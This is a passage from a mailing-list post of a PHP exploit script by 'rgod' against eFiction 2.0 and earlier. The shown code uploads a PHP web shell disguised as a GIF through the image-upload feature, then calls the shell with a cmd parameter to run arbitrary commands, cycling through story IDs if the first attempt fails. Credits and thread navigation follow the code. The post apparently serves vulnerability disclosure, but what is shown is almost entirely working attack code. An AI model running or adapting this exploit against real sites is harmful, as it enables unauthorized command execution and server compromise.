chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

$data='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="upfile"; filename="C:\suntzu.php"
Content-Type: image/gif

'.$SHELL.'
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="submit"

upload
-----------------------------7d529a1d23092a--
';

$packet="POST ".$p."user.php?action=manageimages&upload=upload HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n";
$packet.="Referer: 
http://".$host.":".$port.$path."/user.php?action=manageimages&upload=upload\r\n";;
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; 
boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$COOKIE."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);

#STEP 3 -> Launch commands...
$packet="GET 
".$p."stories/".$username."/images/suntzu.php?cmd=".urlencode($command)." 
HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
                     else {echo "Trying STEP 4...";}

#STEP 4 -> If Step 3 failed... maybe this is efiction 2.0, cycliing GET 
requests...
for ($i=1; $i<=100; $i++)
{
$packet="GET ".$p."stories/".$i."/images/suntzu.php?cmd=".urlencode($command)." 
HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi("GIF89",$html)) {echo "Exploit succeeded..."; die;}
}
//if you are here...
echo "Exploit failed...<br>";
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
?>

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/efiction2_xpl.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • eFiction <= 2.0 multiple vulnerabilities, retrogod <=
Previous by Date:  MDKSA-2005:216 - Updated fuse packages fix vulnerability, Mandriva Security Team
Next by Date:  Mandriva Security, [at]
Previous by Thread:  MDKSA-2005:216 - Updated fuse packages fix vulnerability, Mandriva Security Team
Next by Thread:  Mandriva Security, [at]
Indexes:  [Date] [Thread] [Top] [All Lists]